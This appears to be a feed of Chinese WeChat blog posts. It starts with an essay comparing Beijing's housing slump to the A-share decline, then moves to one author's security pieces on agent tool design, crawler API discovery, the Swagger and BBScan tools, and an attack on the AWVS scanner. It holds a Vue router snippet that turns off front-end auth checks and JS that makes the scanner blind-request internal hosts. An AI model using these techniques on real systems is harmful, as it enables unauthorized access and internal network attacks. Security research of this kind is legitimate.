北京楼市正在复刻A股过去几年刚刚演绎完的一轮“漫长阴跌”，基于什么样的内在逻辑，普通人应该如何选择？

提示：笔者非专业人士， 请指正，谢谢

如果在2021年到2024年间，你曾经深度参与了A股投资，你可能会认同我的这个观点：

北京楼市正在复刻A股过去几年刚刚演绎完的一轮“漫长阴跌”

挤牙膏式的政策利好逐渐失灵，市场不再反应，或者反应1-2个月后继续阴跌。这是A股股民再熟悉不过的节奏。在没有类似股市“2024.9.24”级别的强政策干预下，房产市场尚未见底。机构观点（瑞银、大摩、高盛等）主流预测，2027年左右整体见底，一线城市可能略提前。更重要的是，整体见底不意味着都还能再涨回来，房子会逐步分化：好的区域或许能涨回来，有些地方，是永远涨不回来了。

笔者租住三里屯，亲眼见证了三里屯“涉外公寓”海晟名苑北区的“腰斩”，从历史高点，2017年的12.9万/平，下跌到今天的6.2万/平！租金也下降了30%有余。三里屯区域常住外国人2万，过去外企高管、外媒记者能报销1.5-4万/月租金，只要你家是好房子，能开票，就能租出很好的价格，但这种好日子已经成为过去时了。

北京不同区块正在快速价值重估：

• "学区房"泡沫破裂，人口减少、学区政策变化，年轻人不愿意买单。北京的房子，大部分溢价都在学区上。 笔者最近也在看房，相隔200米，一条街两侧的房子：次新好房5万/平，老破小12万/平。只因两个楼的学区不同！12万当中，有9万都是学区溢价。年轻人愿意买单9万每平方的学区吗？至少，我不愿意

• 房地产作为中国家庭核心资产的“金融属性”正在快速剥离。作为买家，我的心态逐渐变成：房子就是消费品，我更需要的是居住体验和居住品质。北京租售比这么好，租住的性价比非常高！

• 买的是负债，还是资产：在主流看空的大环境下，我身边年轻人的买房心态变了。身边亲友出现贷款卖房、资不抵债的情况。在年轻人心中，买房 == 开启负债

• 有产业支撑的区域，会强者恒强：韩国人离开，阿里搬走后，望京的房价下跌接近40个点。外国人走了， 三里屯涉外公寓直接腰斩。然而，抄底需谨慎，不是谁跌的百分比多，就意味着更安全。问问自己，这些走掉的人/产业，他们还会回来吗？ 如果答案是否定的，就要小心了！

A股的昨天，就是北京楼市的今天

从2021年高点到2024年初的低谷，A股经历了一轮“去泡沫”和“流动性枯竭”死亡螺旋。笔者账户曾出现逆天的14个交易日连跌！很多人连跌5天就已经心理崩溃了，想补仓，已经补不动了，你会作何感想？ 眼睁睁看着账户金额每天在扣钱，一睁眼，账户又开始扣钱了。

利好钝化

A股阴跌期间，降准、降息、喊话层出不穷，每一次利好都成了套牢盘离场的机会。市场对常规政策产生了“耐药性”。这和当前北京楼市的反应是一样的——放松限购、降低首付比例、下调LPR，市场反应冷淡，成交量短暂脉冲后迅速回落。这些剧情，我们在A股，已经体验过很多轮了。

流动性枯竭

A股在低谷时，成交额也萎缩到地量。

回顾2025年的北京房价走势，晚买几个月，就能省8个点，花钱更少，买到更好的房！

有价无市的情况下，急于变现的卖家不断下调底价，带动整个小区的成交价不断下探。

2025的购房者，包括笔者本人，普遍有这样的心态：只要你卖的这一套，不比上一套成交的同户型价格再低几个点，我根本不会考虑买！

继续观望，过几个月我还能买到更好的，更便宜的！要想成交，卖方至少还要让出几个点的下跌空间给我作为安全垫！

所以，你看到，小区卖房的业主互相踩踏，均价螺旋下跌，难以止跌。 十几天前刚成交的价格，已经卖不掉了！找谁说理去？

供需失衡，纯买方市场，几天前成交的价格买家不认，要求更低！

北京楼市何时止跌

只有超预期的、直接注入流动性的政策干预，才能扭转北京房产的下跌趋势。政策还在试点和研究中，出台尚需一些时日。

三里屯重灾区

笔者过去几年截图了链家均价图，发现三里屯区块，是房价下跌的极重灾区。

比如，海晟名苑北区： 从高峰期的600万跌至不到290万，跌幅50%

本质上，是这个区域租金大幅下跌引发的重新定价。只要租金没有止跌，这种重度依赖租赁的房产很难见底。

望京重灾区

如果说三里屯的下跌代表了消费退潮，那么2025年望京的大幅下跌，代表了互联网红利的终结。

过去十年，望京的房价是靠阿里、美团互联网大厂员工的高薪和期权撑起来的。然而，2025年互联网行业持续“降本增效”: 裁员常态化，薪资缩水，股票缩水，“码农”们的支付能力大打折扣。

AI同样正在重塑就业市场，程序员害怕自己的工作被AI替代了。这种对未来收入不确定性的焦虑，导致互联网从业者从“激进加杠杆买房”转向“疯狂存钱还贷”。

当一个高薪群体开始集体防御时，他们所在区域的房价泡沫就会破裂。

置换链条的下跌传导

300万左右的房子，是北京成交的主力区间，是所谓的"刚需上车房"，印象中成交占比45%。北京近期的成交，不少是改善需求，小的换大的，破的换新的，郊区换核心的。而这种置换，是首先贱卖便宜的房子，再买个贵的。当买方的钱大幅缩水了，目标区间的价格也必须降下来，他们才买得起：

• 200-300万的老破小最先下跌，深跌

• 300-500万的下跌，买方资产缩水，不跌别人也买不起

• 500-800万接着跌

• 800-1500万下跌

• 1500-4000万下跌

以笔者的观察，下跌已经传导到800-1500万的区间了，比如曾经的老牌豪宅，如今不再豪宅的朝阳公园棕榈泉公寓。 800万不到，就能买入一套。

学区房的黄昏

在房地产的所有细分板块中，学区房曾经是最坚固的泡沫。但在2025年，年轻人已经开启了反向叙事：买房不买学区房，坚决不接学区溢价的飞刀。

笔者便是一例，通过数据分析、AI工具，正在努力寻找没有学区溢价的区块。当然，这在全区皆是学区的海淀，显得非常困难。

中国人口出生率断崖式下跌，过去的“一位难求”，未来变成“学位等人”。当学位不再稀缺，依附于学位的房子——学区房，其溢价会逐步缩水。

现在花9万溢价买学区的朋友，数年后会感受这9万泡沫逐步缩水的痛苦。学区房的泡沫破裂，是不可逆的结构性崩塌。

市场的K型分化

2025年的北京楼市，不是普跌，而是所谓的K型分化

产品分化

• 下行线：老破小，流动性逐渐枯竭，银行也不给贷款了，除非有拆迁预期，否则价值将持续不断缩水 

• 上行线/抗跌线：高品质次新房，卖掉老破小的家庭，最终会流向这里

区域分化

• 核心区（三环内及核心产业园周边）：医疗、教育、顶级商业资源的不可复制性，属于“核心资产”

• 远郊与环京：库存重灾区

下行周期中，如何选择？

在“现金为王”的时代，你手上的钱，每一年都能买到更多更好的东西。我们应该怎么选？每一个普通家庭的资产配置决策都影响未来十年的财富阶层。

什么时候买房合适？

• 刚需首套：多看少动，寻求安全性

• 现在的市场是绝对的买方市场，通常，你可以要求卖方参考市场成交价，额外提供8-15个点的下跌风险安全垫（着急卖的卖方太吃亏了）

• 建议：多看少动，现金理财。现在的租售比极其划算，租房是比买房更好的财务选择

• 置换改善：先卖后买

• 这是铁律。在流动性枯竭的市场，卖出是最难的。只有把手里的“老破小”变成现金，你才有资格去挑选那些正在降价的“次新房”

• 学区房

• 尽量避免高溢价的学区老破小，政策风险极大。如果为了孩子上学，建议关注那些教育质量均衡、溢价较低的区域，或者直接考虑租房上学的可能性（随着政策推进，租售同权范围在扩大）

投资选择：持币？炒股？买房？

• 房地产：不再是投资品

• 除非你是为了自住且能长期持有（10年以上），否则不要把买房当作投资。扣除利息、税费、折旧和机会成本，未来几年房产的真实收益率大概率为负

• 炒股（A股）：高风险的高赔率博弈

• 如果你相信国运，配置宽基指数（如沪深300）可能比买房具有更好的流动性。但前提是，你使用的是闲钱，且能承受波动

• 持币：

• 在通缩压力和资产价格下跌周期中，现金的购买力实际上是在提升的。持有低风险理财产品，虽然名义收益率低，但在此刻，本金的安全和流动性的充裕比什么都重要

结语

A股用三年时间告诉我们：趋势一旦形成，就不会轻易改变，除非有强大的外力打破惯性。北京楼市的“9.24”时刻尚未到来。在这之前，市场将持续探底。对于普通人来说，这不再是一个闭眼买房致富的时代，而是一个需要极度审慎、精算租售比、甚至由于恐惧而保持敬畏的时代。

2026，祝大家越来越富！

阅读原文

跳转微信打开

阅读原文

跳转微信打开

让我用一个简单案例，介绍LLM推理能力的进化。LLM在越来越多的任务中，表现出了典型的自我反思，它主动评估结果，尝试改进方法，优化策略，并最终得到用户所需的结果，越来越显示出解决复杂问题的 "思路"和能力。

阅读原文

跳转微信打开

让我们来讨论一个企业级Agent设计难题。如果是你，你将如何设计，组织，调度一个20+功能Agent，300+ 数据表，几百个API的复杂系统？

ReAct Agent中如何使用组织和调用工具？常见的方法

• Prompt： 写提示词约定，让它输出某个包含function 和 参数的json。简单，自然语言，但缺点是非常不稳定，扩展性差，参数处理容易出现问题

• Function Call：稳定、安全性最高，确定性最高

• 依赖LLM 动态生成下游代码 (SQL/DSL/Python)： 灵活性极高，支持处理复杂动态查询。但缺点明显，非常不稳定，有安全风险（如SQL注入）。 视你使用的模型能力强弱，通常，失败率不低

你看到了，Function Call肯定是最好的啊。

事实上，20个Tool以内的场景，你可以比较自由地组合上面的3个方法，怎么方便怎么来。

然而，当存在几百个工具的时候，Function Call也玩不转了。

  工具过多撑爆LLM上下文 

假设你有200个工具（函数），每个工具都有一定长度的功能描述、参数描述。200个工具描述，累计占用的上下文（输入Token），是无法接受的，会出现撑破模型上下文窗口。

无论LLM最终是否决定调用这200个工具里的某几个，全部定义（json schema）都需要被完整地发送出去，因为模型需要看到所有工具，才能判断到底用不用，用几个。极端情况，你发了200个工具描述，LLM响应：谢谢你，jiejie，工具都很好，但，没有我需要的那个。

还有一个大问题，工具过多之后，会极大地分散LLM注意力。甚至由于部分工具存在相似性。模型的表现会越来越不稳定。 这次选ToolA，下次说不定选出来ToolB。结果的确定性、一致性会显著下降。

  工具检索 Tool RAG 

200个工具直接堆一起，肯定是不能用的。LLM会陷入选择困难。常见的解法

• 数据和工具分层设计

• 把你的工具、你的数据，通过分类方法聚类。在识别用户意图之后，通过一定算法选取子集或路由

• 弊端：心累，耗费不少时间为工具打标、分类。而且，你的分类真的合理吗？

• 通过用户自然语言输入，检索适当工具

• 这个方法叫Tool Rag

第一种，太麻烦了，先放弃吧。如果你有现成200个提供工具、暴露API的业务帮你写，可以考虑。

第二种，让我来写几个demo测一下。

需要说明的是，我没有对用户输入进行丰富预处理。像安全Agent，运营同事的输入可能非常简单，你看到的意图就2个字："调查" "排查"。

试验条件

• 存在98个安全运营工具，每个工具都是一个函数，doc string都写好了

functions.append({"name": node.name, "docstring": docstring})

• 嵌入模型使用Gemini text-embedding-004(QUESTION_ANSWERING)

• https://ai.google.dev/gemini-api/docs/embeddings

• 存储使用ChromaDB

我们来检索几个问题看看效果

输入: lijiejie名下有哪些漏洞？
命中工具:
Tool: get_owner_by_domain, Similarity: -0.1327
Tool: get_installed_software_list, Similarity: -0.1965
Tool: get_http_headers, Similarity: -0.2008
Tool: search_for_jar_package, Similarity: -0.2079
Tool: check_domain_in_waf, Similarity: -0.2234
Time elapsed: 2.73

耗费3秒，就查出来这些工具，巨坑。

输入: 找出所有受CVE-2025-6554 影响的资产，需要owner信息？
命中工具:
Tool: get_owner_by_ip, Similarity: 0.1356
Tool: get_owner_by_url, Similarity: 0.1240
Tool: get_owner_by_domain, Similarity: 0.0913
Tool: query_url_owner, Similarity: 0.0565
Tool: query_ip_owner, Similarity: 0.0450
Time elapsed: 2.64

不查了，可以看到，如果不处理意图转换，这条路绝对是行不通的。至少在安全运营的场景，运营同事的输入，利用语义相似度查询，查出来的工具没有卵用。因为如果你不是安全运营，根本不可能懂得输入和要用的工具是什么依赖关系。

像上面的问题，笔者输入了owner这个关键词，就命中出来一堆owner工具。这对吗？明显不对！

  我的方案: 只告诉LLM有什么数据 

在前面2篇文章中，笔者已经提到过自己的方案

• 0 Tools：是的，这并不是最可靠的方案，我没有声明任何工具

• 只告诉模型数据在哪里，有什么样的数据。具体要查什么，由LLM自己决策

• 所以，我必须再次强调。模型理解分析场景、分解任务的能力至关重要，安全运营场景下，应该调哪个Agent去完成任务，是LLM自己决定的

• 如通你的模型能力太弱，绝对是玩不转几百个数据表，几十个Agent多轮来回调用的复杂场景。

• Prompt + 数据分层：将数据进行简单分层聚类。由于工具众多，必须进行适当的聚合，再到功能Agent中，进行子任务的分析处理。

  总结 

总结，Tool RAG不行，这种语义相似度查询根本不好用。

Prompt并不稳定，但在几百个工具（Tool）的情况下，你就需要考虑这个最不稳定的prompt方案。

功能性Agent内部你可以with tools，通过Function call 去组织工具。

阅读原文

跳转微信打开

在安全运营方面，LLM想要有出色的表现，至少依赖2个方面

• 模型本身必须具备Deep Thinking能力

• Agent必须能够获取高质量的数据，利用企业内部的信息优势

在0剧本的情形下，LLM已经表现出较高的智能水平，能够分析、自动规划、解决相对复杂的问题。

今天我们再来看一个例子。

阅读原文

跳转微信打开

Leader在群里发了一个链接。

看标题，出现新漏洞了。作为一个充满能量，Deep Research几十次就能消耗0.2元人民币巨款的AI机器人，我立即开始了积极响应。

首先，LLM 识别意图，收到的这个链接是什么东西？用户的输入很简单，可以直接丢链接，当然加动作提示【调查】【排查】会更好。

提示词摘要

请分析其是否为安全情报，如果是，则输出1句自然语言的指示。让你部门的安全工程师去开展对应的排查。

• 只需要告知 什么产品 什么版本 出现了漏洞

• 告诉对方需要全网排查一个威胁情报: hash /ip /domain/ 进程 / jar包等 

如果不是安全情报，则输出一段话总结文章内容。

观察其输出

{"threat_info": "true",   "response": "XXX SPAM XXX 邮件网关产品2.26(2.250304)及以下版本存在远程代码执行漏洞，请安全工程师立即开展对应的排查。"}

  Planner任务规划  

Intention完成意图分析后，会交给Planner继续处理。（Intention这一步并不必须，只是拦截一些general QA回答，减少Token消耗）

Planner规划给3个Agent开展调查

• 委派 扫描器 检查相关漏洞、Web指纹、Banner

• 委派 SOC 搜索相关告警、漏洞工单

• 委派 WAF 搜索相关攻击日志

对于Planner，真正体现模型强大的地方在于：

• 0剧本，没有提前拟定任何 workflow。 我没亲手教LLM做事，是它自己知道如何去做（他清楚自己的角色）

• Planner只知道这些信息：

• 你有一堆的colleague，要查A信息找A，要查B数据找B。要执行C动作找C

• 所有的分析调查都是Planner自己规划的

• 所有的任务都是以自然语言委派的，不存在任何预设的工具调用

• 模型为 doubao-1.5-pro-32k-250115 gemini-2.0-flash 

  
  

阅读原文

跳转微信打开

目前，各大SRC接收的漏洞中，API接口漏洞占比极高。本篇首先介绍白帽子常用爬虫的API接口发现能力评测

  写本地文件减少HTTP请求  

笔者尝试尽可能地去重，减少重复HTTP请求。但因为JS事件的传播机制，同一个事件会在多个父子元素之间重复执行。

笔者的方法，是根据URL+参数进行本地存储，仅第一次请求会产生服务器请求。其余请求则从本地文件读取后返回给浏览器。加速页面上的交互执行。

已存储的JS + API 响应包，则可以用于扫描分析。

  不放过任何一个对话框  

不放过modal框就是不放过可能的API接口。

很多时候我在写代码的时候，纠结的是要不要等（也即sleep/ wait）？

不等，怕错过。

等，扫描太慢了！

等多久？10ms ? 20ms？ 100ms? 甚至1s?

在触发执行的时候可以不等，一股脑全丢过去触发了。 

但一旦在这个过程中监视到了dialog，必须有基本的机制能回溯到这个dialog并对其进行深度交互。

最后

工具还没开源，扯了半天。 总之，程序的事情，要以效果说话。 

No more speech, show me the code

阅读原文

跳转微信打开

本篇总结了常见动态爬虫收集不全API接口的原因。

API接口对于现代Web漏扫至关重要，有时候，1-2个隐蔽接口，就能决定扫描任务的成败。笔者做了大量实验，想要定位清楚，是什么原因导致crawlergo radium项目产生API接口遗漏问题。

  事件函数的触发执行   

加载完成一个Web页面之后，程序需要自动化触发，执行该页面上绑定的所有事件函数。

CrawlerGo是通过override Element.prototype.addEventListener 方法，来收集全部的DOM事件。收集完成后，再统一地触发执行，相关代码如下

for (let node of nodes) {
    let loop = 0;
    let event_name_list = node.getAttribute("sec_auto_dom2_event_flag").split("|");
    let event_name_set = new Set(event_name_list);
    event_name_list = [...event_name_set];
    for (let event_name of event_name_list) {
        let evt = document.createEvent('CustomEvent');
        evt.initCustomEvent(event_name, true, true, null);
        if (event_name == "click" || event_name == "focus" || event_name == "mouseover" || event_name == "select") {
            transmit_child(node, evt, loop);
        }
        if ((node.className && node.className.includes("close")) || (node.id && node.id.includes("close"))) {
            continue;
        }
        try {
            node.dispatchEvent(evt);
        } catch (e) {}
    }
}

经笔者测试，在一个for循环中不停node.dispatchEvent，会出现丢事件的现象。举例说明，在笔者选定的测试站点中，遍历click菜单中的item，却出现只打开了最后一个。其他导航请求并没有正确被拦截到。

这自然是因为，某一类事件是依赖全局状态的，连续触发就等于触发最后1个。但笔者想要收集更全的事件。因此增加适当的延迟，如10ms

node.dispatchEvent(evt);
await new Promise(resolve => setTimeout(resolve, 10));

经测试，少量延迟可以解决这类问题，收集全我们需要的URL。

   动态加载未触发的严重缺陷   

上面的缺陷或许不算太严重，丢几个事件，运气好的话，其他逻辑还有机会补回来数据。

但下面我要介绍的这个缺陷，是最为致命的。CrawlerGo在单个页面上只触发1次DOM事件。看笔者在测试页打印的log

log: Found 60 nodes to dispatch events
log: After trigger all events, found 174 nodes to dispatch events

起初，程序收集到60个要触发事件的元素。

等程序把这60个元素上的dom事件都触发后，绑定事件的element已经增加到了174个。

出现这个现象的原因，是因为一些元素是动态添加的，甚至是动态加载的。

CrawlerGo没有收集到这些新增的绑定事件，没有将其触发。因此丢掉了相当比例的接口。

这些接口，一般是在Modal对话框上出现。

例如，笔者的测试页面中，就打开了多达4个Dialog。这些接口都被漏掉了。

解决方法也很简单，持续收集新增出现的绑定事件，一直触发，直到没有新的事件绑定出现再结束当前页面的处理。

   小结   

本篇总结了常见动态爬虫收集不全API接口的原因。

因现代web页面存在较多动态加载的元素、功能，因此，爬虫需要持续收集事件绑定，并且完整地触发所有事件。

尽可能多地收集完所有API接口

阅读原文

跳转微信打开

现代Web应用中，SPA占比非常高。本篇介绍动态爬虫识别框架，并尝试移除前端鉴权。

typeof window.__VUE__ !== 'undefined' || typeof window.Vue !== 'undefined'

const vueElements = document.querySelectorAll('*');for (const el of vueElements) {    if (el.__vue__ || el.__vue_app__) {          return 'vue';   }}

window.$router
divObject.__vue_app__.config.globalProperties.$router
divObject.__vue_app__.$router

function recursiveFindRouterWithPush(obj, depth = 0, maxDepth = 5) {if (depth > maxDepth) {return null;	}
for (const key in obj) {try {if (key === '$router' && obj[key] !== null && typeof obj[key] === 'object' && typeof obj[key].beforeEach === 'function') {return obj[key];			}		} catch (error) {
		}
try {if (typeof obj[key] === 'object' && obj[key] !== null) {const foundInSubObject = recursiveFindRouterWithPush(obj[key], depth + 1, maxDepth);if (foundInSubObject) {return foundInSubObject;				}			}		} catch (error) {
		}	}
return null;}

$router.getRoutes()$router.options.routes

foundRouter.getRoutes().forEach(route => {    for (let key in route.meta) {        if (route.meta.hasOwnProperty(key) && key.includes('auth') && route.meta[key] === true) {            route.meta[key] = false;        }    }})

foundRouter.push('/some/secret/page/you/can/not/access')

// Next.js, method 1: 检查 Next.js 的全局变量if (typeof window.__NEXT_DATA__ !== 'undefined') {return 'nextjs'; // Next.js 是基于 React 的，应该优先判断}// Next.js, method 2: 检查特定的 meta 和 script 标签if (!!document.querySelector('meta[name="next-head"]')){return 'nextjs';}; const scripts = Array.from(document.querySelectorAll('script[src^="/_next/"]'));if (scripts.length > 0) {return 'nextjs';}

// React, method 1: 检查 React 相关的全局变量if (typeof window.__REACT__ !== 'undefined' || typeof window.React !== 'undefined' || typeof window.__REACT_DEVTOOLS_GLOBAL_HOOK__ !== 'undefined') {return 'react';}
// React, method 2: 检查 DOM 元素上的 React 属性const rootElement = document.getElementById('root') || document.querySelector('*'); // 尝试获取根元素if (rootElement) {for (const key in rootElement) {if (key.startsWith('__react') || key.startsWith('__reactFiber$')) {return 'react';		}	}}

if (window.angular || window.ng) {return 'angular';}
if (document && document.querySelector('[ng-version]')) {return 'angular';}

阅读原文

跳转微信打开

Burp测试结果 上一篇中，因Burp不支持配置交互登录，笔者在本地启动一个代理，注入cookie，

阅读原文

跳转微信打开

目前，各大SRC接收的漏洞中，API接口漏洞占比极高。本篇首先介绍白帽子常用爬虫的API接口发现能力评测

越权、未授权访问、敏感接口暴露、信息泄漏、并发、SSRF等

域名、IP、端口、指纹、业务特性、框架、字典等

• 1) 静态爬虫扫描器：获取API接口能力接近为0
• 2) 动态爬虫扫描器： 若无法带身份扫描，获取API接口接近5%
• 3) 动态爬虫扫描器 + 支持认证： 如果不具备深度发现API接口的功能，接近发现30%
• 4) Burp Suite + 人工导航： 接近发现40%，很多接口，测试同学的账号找不到功能入口，不具备身份权限

• 5) 动态爬虫+Burp+Fuzz+人工： 幸运的情况下，能接近50%

<input type="text" class="el-select__input" autocomplete="off" role="combobox"

阅读原文

跳转微信打开

https://eyes.sh 现存大约2000名用户。前阵子因为发现有丢日志现象，临时关停了服务。经过一些优化后，目前该服务已经恢复上线。

背景

完成的优化

• 用户二级子域名支持https访问和记录日志，如：https://demo.eyes.sh
• 用户三级域名不能https访问，因为Let's Encrypt 不能无限签发SSL证书。如： https://test.demo.eyes.sh   因此，在需要https访问的场景下，不能使用更深的子域名

3. 提供简单接口用于测试存储XSS

在需要测试存储XSS的地方，可以输入类似如下脚本

用户自行部署DNSLog服务：https://github.com/lijiejie/eyes.sh

阅读原文

跳转微信打开

这是一个 Swagger API 信息泄露的利用小工具。

这是一个 Swagger API 信息泄露的利用小工具。 

它完成几个简单的工作：

• 遍历所有API接口，自动填充参数

• 尝试 GET / POST  所有接口，返回 Response Code / Content-Type / Content-Length ，用于检查接口是否可以未授权访问利用

• 分析接口是否存在敏感参数，例如 ['url', 'path', 'uri']，容易引入外网的SSRF漏洞

• 检测 API认证绕过漏洞

• 在本地监听一个Web Server，打开Swagger UI界面，供分析接口使用

• 使用Chrome打开本地Web服务器，并禁用CORS，解决部分API接口无法跨域请求的问题

• 当工具检测到HTTP认证绕过漏洞时，本地服务器拦截API文档，修改path，以便直接在Swagger UI中进行测试

[2024-06-07] 增加支持 OpenAPI 3.0 格式的文档

工具地址： https://github.com/lijiejie/swagger-exp

阅读原文

跳转微信打开

BBScan 是一个高并发的、轻量级的Web漏洞扫描工具。它帮助安全工程师从大量目标中，快速发现，定位可能存在弱点的目标，辅助半自动化测试，特别是API接口的安全测试。

背景

随着时间推移，BBScan作为一款漏洞扫描工具已经过时，在9年前，这样的工具还能够以数量和速度优势，捡到一些中低危漏洞，但如今，确实是扫不到什么有价值的东西了。

常见Web框架引入了更多的默认安全设计、WAF/RASP等防护技术更加成熟，曾经常见的SQL注入/XSS/命令注入等，现在反而见得不多了。取而代之的，各大SRC现在收到的漏洞中，有相当比例是逻辑越权类的。

于是，笔者对这款古董级的BBScan进行了如下改造

• 支持Web指纹识别，帮助安全工程师快速定位到感兴趣的应用

• Web指纹来自 https://github.com/0x727/FingerprintHub  感谢作者

• 支持Javascript 解析功能

• 目前很多站点是单页应用，对扫描器可见的仅仅是静态资源打包后的少数几个.js。扫描器需要解析js，扫描诸如 Token/Secrets/Password/Key 泄露，发现API接口

• 支持从javascript文件中，正则提取疑似API接口

• 在当前版本中，考虑到速度，并没有对提取的URL进行自动化测试，但计划增加一个heavy mode ，扫描API接口
  

• 减少漏报:  优化减少DNS查询次数，提高稳定性。在家庭网络环境下，观察到DNS设施相对脆弱，容易出现漏报问题

• 减少误报：优化了误报验证逻辑

• 界面优化：对输出的HTML报告，进行了简单优化，提升可读性

改造效果

BBScan项目地址：https://github.com/lijiejie/BBScan

笔者首先利用另一个工具 subDomainsBrute暴力枚举了3个域名 

*.baidu.com *.qq.com *.bytedance.com

随后将发现的域名文件丢给BBScan，扫描生成3份报告（请复制后打开）

• https://www.lijiejie.com/python/BBScan/qq.com_report.html

• https://www.lijiejie.com/python/BBScan/bytedance.com_report.html

• https://www.lijiejie.com/python/BBScan/baidu.com_report.html

如上图所示，扫描器利用默认的内置规则，能够识别到这是一个管理后台。同时，扫描器还从js文件中，提取到12个疑似API接口。

针对这样的一份报告，可以进行如下处理

• 首先检查通过内置规则扫出的漏洞，一般是信息泄露、各类后台、JS中的秘钥泄露

• 检查web指纹是否识别到你可能感兴趣的通用应用、框架、开源或商业产品

• 对发现API接口的站点，进行重点分析和测试，点开感兴趣的接口重点分析和扫描
  

• 对API网关进行测试和评估

• 对报告中泄露的内网域名、IP进行简单分析

• 通过关键词搜索你感兴趣的关键词，如Header Name、特殊的Cookie

  
  

  

使用问题

对大量目标快速指纹识别

python BBScan.py --fingerprint -f urls.txt --api

请注意， 这个 --fingerprint 开关，是指定只扫描web指纹，其他规则反而会被禁用。

如下图所示，本工具可以在较短时间内扫描完上万网站

完整扫描模式

python BBScan.py -f baidu.com_full.txt  --full --api

--network MASK  任何时候都可以使用该参数，把子网中的其他相邻IP，一并添加到扫描任务中。虽然不建议这么做，但下面的命令是真的可以工作，你或许会得到1个超大HTML

--host 10.1.1.1 --network 8 --fingerprint

上面的命令指定扫描 10.1.1.1/8 整个内网，打开文件时，可能出现Chrome浏览器Out Of Memeory，所以，建议指定为更小的指，建议不小于16。

--skip, --skip-intranet  排除内网IP的扫描，这对白帽子比较实用，避免浪费扫描资源。

未来优化

BBScan未来可能进一步优化API接口的扫描

• 增加对API接口的重扫描、分析支持

• 正则优化，解决API接口提取不够精准的问题

• 优化对隐蔽API接口的暴力枚举发现、source map泄露发现等

• 子域名/Email的收集整理、证书的收集整理

  
  

因时间有限，部分功能还未开发完成，同时，开发过程测试不充分，请大家反馈功能建议和Bug问题。  :)

古董扫描器BBScan的复活，希望它对你有一定用。虽然，显然还不够有用。  :)

项目地址：https://github.com/lijiejie/BBScan

阅读原文

跳转微信打开

下午，同事问我：有办法终止一个阻塞的raw_input吗？他希望：用户既可以在终端标准输入，也可以选择外部手机扫码输入。

下午，同事问我：有办法终止一个阻塞的raw_input吗？

他希望：用户既可以在终端标准输入，也可以选择外部手机扫码输入。任意条件满足的情况下，程序都能继续向后执行。 

但是，上述raw_input会阻塞，导致不能检查是否有成功扫码。

为了得到想要的效果，我写了一个示例程序，方法如下：

• 从终端读取标准输入的阻塞操作，必然不能在原先的函数中执行，交由子进程处理

• 扫码确认的动作，交给1个单独线程轮询处理，这里，我换成了本地文件读取演示

# -*- coding: utf-8 -*-import threadingimport sysimport osimport timeimport multiprocessing

def get_input(file_no, queue_motp):    stdin_obj = os.fdopen(file_no)    code = stdin_obj.readline().strip()    queue_motp.put(code)    stdin_obj.close()

class GetMOTP(threading.Thread):    def __init__(self):        threading.Thread.__init__(self)

    def run(self):        global flag        self.motp_input_done = False        sys.stdout.write("motp>")        manager = multiprocessing.Manager()        self.queue_motp = queue_motp = manager.Queue()
        p = multiprocessing.Process(target=get_input, args=(sys.stdin.fileno(), queue_motp))    # 读取标准输入        p.start()        threading.Thread(target=self.check_from_disk).start()    # 本地读取        while queue_motp.empty():            time.sleep(0.1)        self.motp_input_done = True        p.terminate()        motp = queue_motp.get_nowait()        print("motp: ", motp)        if motp == "good":            flag = True
    # 模拟扫码逻辑    def check_from_disk(self):        while not self.motp_input_done:            if os.path.exists("motp.txt"):                with open("motp.txt", "r") as f:                    code = f.read()                    if code.strip():                        self.queue_motp.put(code.strip())                        return True            time.sleep(0.2)

if __name__ == '__main__':    GetMOTP().start()

以上，无论是用户在终端输入，还是扫码轮询成功，都可以取到输入，并同时终止2类等待，继续执行后续的程序逻辑。

阅读原文

跳转微信打开

本文尝试利用Javascript_AST_Parse.script插件，对Acunetix WVS扫描器进行一定的反制测试。

Acunetix WVS扫描器功能强大，插件丰富，广受白帽子们喜欢，是最为经典的重web扫描器之一。广泛地被攻击队使用，不少企业也在使用它进行内部安全巡检。过去，已有安全研究人员公开过低版本AWVS的RCE反制漏洞（目前已经被蜜罐产品在用）。笔者近期在分析AWVS插件时，对其中一个插件产生了兴趣，进行了一些简单的测试，尝试利用插件执行逻辑，对扫描器进行一定的反制。

Javascript_AST_Parse.script插件

本文介绍的插件是：Scripts/PerFile/Javascript_AST_Parse.script（得到AWVS插件明文的方法，请自行检索）。

该插件的作用是：找到Javascript文件中的所有ajax请求，交给扫描器去执行请求。

这意味着，并不需要特定事件被触发，就能执行到这些HTTP请求，帮助扫描器发现API接口，捕获HTTP响应。AWVS受限于默认的静态爬虫，如果不去解析JS，是找不到这些较为隐蔽的HTTP接口的。

插件工作流程为：

• 利用acorn解析Javascript代码，生成抽象语法树

• 遍历语法树，找到所有可调用对象（CallExpression）

• 在可调用对象中，递归查找，找到所有ajax请求方法，并将该请求添加到扫描器

function processJavaScriptCode(data) {    try {        var ast = acorn.parse(data);        if (ast) processAst(ast);    }    catch (x) {}}
function processAst(ast) {    var elementsCount = ast.body.length;    for (var i = 0; i < elementsCount; i++) {        recursiveFindCallExpressions(ast.body[i], "");    }}

AWVS使用了acorn来解析javascript，该项目地址为 

https://github.com/acornjs/acorn

反制的基本思路

• 利用扫描器缺陷，向扫描主机植入木马。实现反向控制

• 利用扫描器缺陷，消耗主机资源，实现DOS攻击（内存耗尽OOM，CPU恶意占用）

• 利用扫描器缺陷，反打扫描环境内网

• 利用扫描器缺陷，回传扫描环境的基本信息（User、HostName、IP、OS、用户数据等）

反制：盲打扫描主机所在的内网

笔者经过测试验证，AWVS对ajax请求的目标URL是无限制的。因此，可以在JS文件中，把需要盲打的URL批量吐给扫描器。构造test.js内容为

$(xxx).ready(function(){$.get("http://10.1.11.1:8080/script");$.get("http://10.1.11.2:8080/script");...$.get("http://10.1.12.254:8080/script");});

xxx是不存在的对象，并不能被正常执行，但可以正常解析。在测试页面引入该JS，扫描测试页，可以看到这批URL被扫描器请求了，如下图所示

所以，在JS中向扫描器主动吐出内网漏洞URL盲打，可以发起对扫描主机的内网扫描，它的利用效果跟SSRF盲打是一样的。考虑利用以下漏洞

• 路由器、交换机、防火墙的RCE漏洞

• 常见的内网漏洞：Log4j、Jenkins、Struts2、Confluence、Nexus等

  
  

请注意，GET/POST/DELETE 等方法都是被支持的。通常，在企业内网大范围扫描容易触碰蜜罐，引起各种安全告警。但该主机因为是扫描节点，容易同时也出现被IP加白，主动忽略告警的问题。因此，扫描器被反制利用的风险反而增加了。

